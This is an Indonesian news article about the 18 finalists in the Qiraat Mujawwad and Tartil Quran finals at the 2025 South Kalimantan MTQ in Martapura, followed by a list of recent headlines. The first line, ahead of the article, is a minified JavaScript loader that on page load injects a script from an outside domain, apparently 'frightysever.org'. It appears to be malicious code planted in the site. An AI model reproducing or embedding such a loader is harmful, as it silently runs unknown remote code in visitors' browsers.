(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

18 Finalis Qiraat Mujawwad dan Tartil Quran Bersaing di Babak Final MTQ Kalsel 2025


KANALKALIMANTAN.COM, MARTAPURA – Finalis asal Kabupaten Banjar, Hj Raudah, yang turun pada cabang Mujawwad, mengungkapkan rasa optimistis setelah menjalani persiapan maksimal.

Penampilannya kali ini merupakan debut di cabang Qiraat Mujawwad, setelah sebelumnya lebih sering tampil di cabang Tilawah.

“Kami sudah beberapa kali mengikuti training center, Alhamdulillah didampingi pelatih yang bagus dan berpengalaman. Untuk hasilnya, kami serahkan kepada Allah, semoga yang terbaik,” ujar qoriah asal Martapura Timur itu.

Baca juga: Kafilah HSU Tampil di Final Sembilan Cabang MTQ Kalsel


Diketahui, babak final cabang Qiraat Mujawwad dan Tartil Quran Musabaqah Tilawatil Quran (MTQ) XXXVI Tingkat Provinsi Kalimantan Selatan digelar pada Rabu (25/6/2025) pagi di Masjid Nurul Iman, Indrasari, Martapura.

Sebanyak 18 finalis dari berbagai kabupaten dan kota bersaing memperebutkan posisi terbaik dalam tiga kategori lomba, yaitu murottal remaja, murottal dewasa, dan mujawwad dewasa.

“Enam peserta murottal remaja, enam murottal dewasa, dan enam mujawwad dewasa. Jadi totalnya ada 18 finalis. Insyaallah akan selesai hari ini,” ujar Koordinator Cabang Qiraat Mujawwab dan Tartil Quran, Hadri.

Baca juga: Bupati Banjar Kunjungi Kafilah Peserta MTQ di Sejumlah Penginapan


Ia mengatakan bahwa persaingan antarfinalis berlangsung sangat ketat, dengan kualitas bacaan yang rata-rata sudah berada di level tinggi.

“Alhamdulillah sampai peserta kedelapan, persaingannya luar biasa ketat. Semua finalis merupakan perwakilan terbaik dari masing-masing kabupaten/kota,” katanya.

Baca juga: Satu Jemaah Haji Asal Banjarbaru Dilaporkan Hilang, Punya Riwayat Dimensia

Dari 18 finalis yang tampil, enam di antaranya berasal dari Kabupaten Banjar dan mereka akan bersaing di semua kategori yang dilombakan.

Seluruh proses penilaian final dijadwalkan rampung hari ini dan pengumuman pemenang akan disampaikan pada malam penutupan MTQ di panggung utama Alun-alun Ratu Zalecha Martapura, Kamis (26/6/2025) malam. (Kanalkalimantan.com/dkispbanjar/kk)

Reporter: kk
Editor: Dhani


Muhammad Andi

Recent Posts

Tiba di Banjarbaru, Presiden Prabowo Resmikan 166 Sekolah Rakyat

KANALKALIMANTAN.COM, BANJARBARU - Presiden Prabowo Subianto melakukan kunjungan kerja ke Kota Banjarbaru, Provinsi Kalimantan Selatan,… Read More

1 jam ago

Peluncuran Budaya Sekolah Aman dan Nyaman di Banjarbaru, Ini Kata Mendikdasmen Abdul Mu’ti

KANALKALIMANTAN.COM, BANJARBARU – Kota Banjarbaru menjadi salah satu titik penting peluncuran budaya sekolah aman dan… Read More

2 jam ago

Nilai TKA Jadi Syarat Wajib untuk Siswa Eligible SNBP 2026

KANALKALIMANTAN.COM, JAKARTA - Seleksi Nasional Berdasarkan Prestasi (SNBP) 2026 menjadi perhatian siswa kelas akhir SMA,… Read More

4 jam ago

Korban Tenggelam di Sungai Martapura Ditemukan Senin Dinihari

KANALKALIMANTAN.COM, BANJARMASIN — Remaja laki-laki yang tenggelam di Sungai Martapura, Kota Banjarmasin ditemukan dalam keadaan… Read More

6 jam ago

Banjir Rob Murung Selong Banjarmasin 407 Jiwa Terdampak

KANALKALIMANTAN.COM, BANJARMASIN - Banjir rob yang menggenangi kawasan Murung Selong, Kelurahan Sungai Lulut, Kota Banjarmasin,… Read More

20 jam ago

Tanggul Halangi Air Keluar di Komplek PWI, Ketua DPRD Banjarmasin Minta Dibongkar

KANALKALIMANTAN.COM, BANJARMASIN - Ketua DPRD Kota Banjarmasin, Rikval Fachruri meninjau banjir rob di komplek Persatuan… Read More

20 jam ago

This website uses cookies.